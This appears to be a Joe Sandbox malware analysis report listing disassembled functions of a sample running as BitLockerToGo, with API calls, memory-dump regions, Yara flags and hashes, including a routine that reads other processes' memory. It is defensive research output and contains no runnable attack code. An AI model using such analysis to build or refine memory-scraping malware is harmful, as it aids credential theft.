                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 954850f5492e239ef8c4c30c21630a56406034aeff67448217f2ad65329e0ee5
                                                                                                                                                                • Instruction ID: b916c16fc70b8c6436eac943d16f08efb6d9719d9a642faea64008e8f01dc560
                                                                                                                                                                • Opcode Fuzzy Hash: 954850f5492e239ef8c4c30c21630a56406034aeff67448217f2ad65329e0ee5
                                                                                                                                                                • Instruction Fuzzy Hash: C0A14A70A02645CFDB14CF29C594A9AFBF1FF49308F54866ED45A97B01E730A985CF90
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCD14C5
                                                                                                                                                                • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CCD14E2
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCD1546
                                                                                                                                                                • InitializeConditionVariable.KERNEL32(?), ref: 6CCD15BA
                                                                                                                                                                • free.MOZGLUE(?), ref: 6CCD16B4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1909280232-0
                                                                                                                                                                • Opcode ID: d1be200e83b528a9cc5b167ec72cb0bfbe5bf55183e04e06a3dfa5a25b5dc272
                                                                                                                                                                • Instruction ID: 0bf3294ee53e2ca642980d2727c07e084f6a7fb4648ae22eac136d2e6d27c27b
                                                                                                                                                                • Opcode Fuzzy Hash: d1be200e83b528a9cc5b167ec72cb0bfbe5bf55183e04e06a3dfa5a25b5dc272
                                                                                                                                                                • Instruction Fuzzy Hash: 6161DF71A007049FDB118F29C880BDEB7B4BF8A318F05851CEE8A57701EB35E949CB91
                                                                                                                                                                APIs
                                                                                                                                                                • strtok_s.MSVCRT ref: 03013588
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • strtok_s.MSVCRT ref: 030136D1
                                                                                                                                                                  • Part of subcall function 0301A820: lstrlen.KERNEL32(00000000,?,?,03015B54,03020ADB,03020ADA,?,?,03016B16,00000000,?,03540578,?,0302110C,?,00000000), ref: 0301A82B
                                                                                                                                                                  • Part of subcall function 0301A820: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A885
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpystrtok_s$lstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3184129880-0
                                                                                                                                                                • Opcode ID: 19bb3661535592a18ec44b3e03f2e1b1c4d22ee0123f10968444c338e47eae1b
                                                                                                                                                                • Instruction ID: 163cac176c84e577565bbf5816ac05342bdabb6fa2386f9e7da29caf3e689d23
                                                                                                                                                                • Opcode Fuzzy Hash: 19bb3661535592a18ec44b3e03f2e1b1c4d22ee0123f10968444c338e47eae1b
                                                                                                                                                                • Instruction Fuzzy Hash: 5D412FB9E12209AFCB44EFE4D848AEEBBB8BF44314F04C418E4167B240DB759615CFA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCCDC60
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,6CCCD38A,?), ref: 6CCCDC6F
                                                                                                                                                                • free.MOZGLUE(?,?,?,?,?,6CCCD38A,?), ref: 6CCCDCC1
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CCCD38A,?), ref: 6CCCDCE9
                                                                                                                                                                • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CCCD38A,?), ref: 6CCCDD05
                                                                                                                                                                • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CCCD38A,?), ref: 6CCCDD4A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1842996449-0
                                                                                                                                                                • Opcode ID: a5ae5ffad7db90a3437c8df0009bd29a9a897b9248e6c04225a2463123508856
                                                                                                                                                                • Instruction ID: b2a31f850e2d7188bce5fa99de5632d978e5553f2a079cbb131ca680131ccde5
                                                                                                                                                                • Opcode Fuzzy Hash: a5ae5ffad7db90a3437c8df0009bd29a9a897b9248e6c04225a2463123508856
                                                                                                                                                                • Instruction Fuzzy Hash: 9B4147B5F00605CFCB00CF99D89099ABBB5FF89314B554569D946ABB10EB31EC00CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • __lock.LIBCMT ref: 0301B39A
                                                                                                                                                                  • Part of subcall function 0301AFAC: __mtinitlocknum.LIBCMT ref: 0301AFC2
                                                                                                                                                                  • Part of subcall function 0301AFAC: __amsg_exit.LIBCMT ref: 0301AFCE
                                                                                                                                                                  • Part of subcall function 0301AFAC: RtlEnterCriticalSection.NTDLL ref: 0301AFD6
                                                                                                                                                                • RtlDecodePointer.NTDLL(0302A120), ref: 0301B3D6
                                                                                                                                                                • RtlDecodePointer.NTDLL ref: 0301B3E7
                                                                                                                                                                  • Part of subcall function 0301BE35: RtlEncodePointer.NTDLL(00000000), ref: 0301BE37
                                                                                                                                                                • RtlDecodePointer.NTDLL(-00000004), ref: 0301B40D
                                                                                                                                                                • RtlDecodePointer.NTDLL ref: 0301B420
                                                                                                                                                                • RtlDecodePointer.NTDLL ref: 0301B42A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2005412495-0
                                                                                                                                                                • Opcode ID: edb6bb14fc46f4a60ce6d839c15190d4b561e59095617eda44d0de464e38dc63
                                                                                                                                                                • Instruction ID: 2fac01a2ebac91add6a732b245bc292f54f4bc3cb51c6df193d20b9e89680f8d
                                                                                                                                                                • Opcode Fuzzy Hash: edb6bb14fc46f4a60ce6d839c15190d4b561e59095617eda44d0de464e38dc63
                                                                                                                                                                • Instruction Fuzzy Hash: C0314778D02309DFDF50EFA9C9842DDBAF1BF48310F14806AD414AA650CBB54960EF25
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6CCAFA80: GetCurrentThreadId.KERNEL32 ref: 6CCAFA8D
                                                                                                                                                                  • Part of subcall function 6CCAFA80: AcquireSRWLockExclusive.KERNEL32(6CCFF448), ref: 6CCAFA99
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCB6727
                                                                                                                                                                • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CCB67C8
                                                                                                                                                                  • Part of subcall function 6CCC4290: memcpy.VCRUNTIME140(?,?,6CCD2003,6CCD0AD9,?,6CCD0AD9,00000000,?,6CCD0AD9,?,00000004,?,6CCD1A62,?,6CCD2003,?), ref: 6CCC42C4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                • String ID: data
                                                                                                                                                                • API String ID: 511789754-2918445923
                                                                                                                                                                • Opcode ID: ac08a93d6bf2e7bcb2c31e351eedc317bd5e817d32a8cee99e2e35026a10e93f
                                                                                                                                                                • Instruction ID: e5d4bf1d254e9a8d058086ae97b23936cd695ea177d8868512b361671e1f0f44
                                                                                                                                                                • Opcode Fuzzy Hash: ac08a93d6bf2e7bcb2c31e351eedc317bd5e817d32a8cee99e2e35026a10e93f
                                                                                                                                                                • Instruction Fuzzy Hash: 64D1CA71A087408FD724CF65D851B9ABBF5AFC5308F10892DE589A7B90FB31A849CB52
                                                                                                                                                                APIs
                                                                                                                                                                • __getptd.LIBCMT ref: 0301C9EA
                                                                                                                                                                  • Part of subcall function 0301BF9F: __getptd_noexit.LIBCMT ref: 0301BFA2
                                                                                                                                                                  • Part of subcall function 0301BF9F: __amsg_exit.LIBCMT ref: 0301BFAF
                                                                                                                                                                • __amsg_exit.LIBCMT ref: 0301CA0A
                                                                                                                                                                • __lock.LIBCMT ref: 0301CA1A
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0301CA37
                                                                                                                                                                • free.MSVCRT ref: 0301CA4A
                                                                                                                                                                • InterlockedIncrement.KERNEL32(0302B558), ref: 0301CA62
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 634100517-0
                                                                                                                                                                • Opcode ID: 79019fc6ea3cd2aad089d4c2790f059264b2d39ef442b9d209d44cc957e2ad65
                                                                                                                                                                • Instruction ID: 9bf55728f1f845bd967ca7ff5a1f660a9832d2ff16d324479898a75d76ce8d60
                                                                                                                                                                • Opcode Fuzzy Hash: 79019fc6ea3cd2aad089d4c2790f059264b2d39ef442b9d209d44cc957e2ad65
                                                                                                                                                                • Instruction Fuzzy Hash: 1701D236A837259FE762FB69800479DB7E0BF40764F594109E8107B280CB38E560CBD1
                                                                                                                                                                APIs
                                                                                                                                                                • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CC7EB57,?,?,?,?,?,?,?,?,?), ref: 6CCAD652
                                                                                                                                                                • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CC7EB57,?), ref: 6CCAD660
                                                                                                                                                                • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CC7EB57,?), ref: 6CCAD673
                                                                                                                                                                • free.MOZGLUE(?), ref: 6CCAD888
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                • String ID: |Enabled
                                                                                                                                                                • API String ID: 4142949111-2633303760
                                                                                                                                                                • Opcode ID: bff7ff71c74d893c98c68449f8f10b63bd44675c756fea475ad2dfa61ffe49ba
                                                                                                                                                                • Instruction ID: 648a96367d054f80a61f54b6f24e683430c254359d7d27cf550ae0c5dd880db7
                                                                                                                                                                • Opcode Fuzzy Hash: bff7ff71c74d893c98c68449f8f10b63bd44675c756fea475ad2dfa61ffe49ba
                                                                                                                                                                • Instruction Fuzzy Hash: 93A1F3B0A0030A9FDB14CFA9C4947AEBBF1EF49318F14845CD895AB741E735A946CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • strlen.MSVCRT ref: 03016F1F
                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0301719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 03016F4D
                                                                                                                                                                  • Part of subcall function 03016BD0: strlen.MSVCRT ref: 03016BE1
                                                                                                                                                                  • Part of subcall function 03016BD0: strlen.MSVCRT ref: 03016C05
                                                                                                                                                                • VirtualQueryEx.KERNEL32(0301730D,00000000,?,0000001C), ref: 03016F92
                                                                                                                                                                • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0301719A), ref: 030170B3
                                                                                                                                                                  • Part of subcall function 03016DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 03016DF8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                                                                                                • String ID: @
                                                                                                                                                                • API String ID: 2950663791-2766056989
                                                                                                                                                                • Opcode ID: 04f2e7faa45f8d7f08f64c8ae0433978cc4b4a651de997a649a5b1d4ef51f06b
                                                                                                                                                                • Instruction ID: c1dd5e59a0629eec40fde730e7130e96775381a412b8a00e1a41b53257bcbdcc
                                                                                                                                                                • Opcode Fuzzy Hash: 04f2e7faa45f8d7f08f64c8ae0433978cc4b4a651de997a649a5b1d4ef51f06b
                                                                                                                                                                • Instruction Fuzzy Hash: EF5117B5E01209EBDB04CF98D981AEFB7B6FF88700F148558F919A7240D735EA11CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CCAF480
                                                                                                                                                                  • Part of subcall function 6CC7F100: LoadLibraryW.KERNEL32(shell32,?,6CCED020), ref: 6CC7F122
                                                                                                                                                                  • Part of subcall function 6CC7F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC7F132
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6CCAF555
                                                                                                                                                                  • Part of subcall function 6CC814B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CC81248,6CC81248,?), ref: 6CC814C9
                                                                                                                                                                  • Part of subcall function 6CC814B0: memcpy.VCRUNTIME140(?,6CC81248,00000000,?,6CC81248,?), ref: 6CC814EF
                                                                                                                                                                  • Part of subcall function 6CC7EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CC7EEE3
                                                                                                                                                                • CreateFileW.KERNEL32 ref: 6CCAF4FD
                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(00000000), ref: 6CCAF523
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                • String ID: \oleacc.dll
                                                                                                                                                                • API String ID: 2595878907-3839883404
                                                                                                                                                                • Opcode ID: 9c942e918ef27de50ddf3ad2bffa9672e9c2e349ec578c0fb2770d343e439377
                                                                                                                                                                • Instruction ID: 2f8e9b49aad0447397833eb7866aa3ba53575bb093628f7e3c19abb99af15b1c
                                                                                                                                                                • Opcode Fuzzy Hash: 9c942e918ef27de50ddf3ad2bffa9672e9c2e349ec578c0fb2770d343e439377
                                                                                                                                                                • Instruction Fuzzy Hash: E84191306087119FE720DFA9D888A9BB7F4BF85318F500A1CF5A593650FB30D94ACB92
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
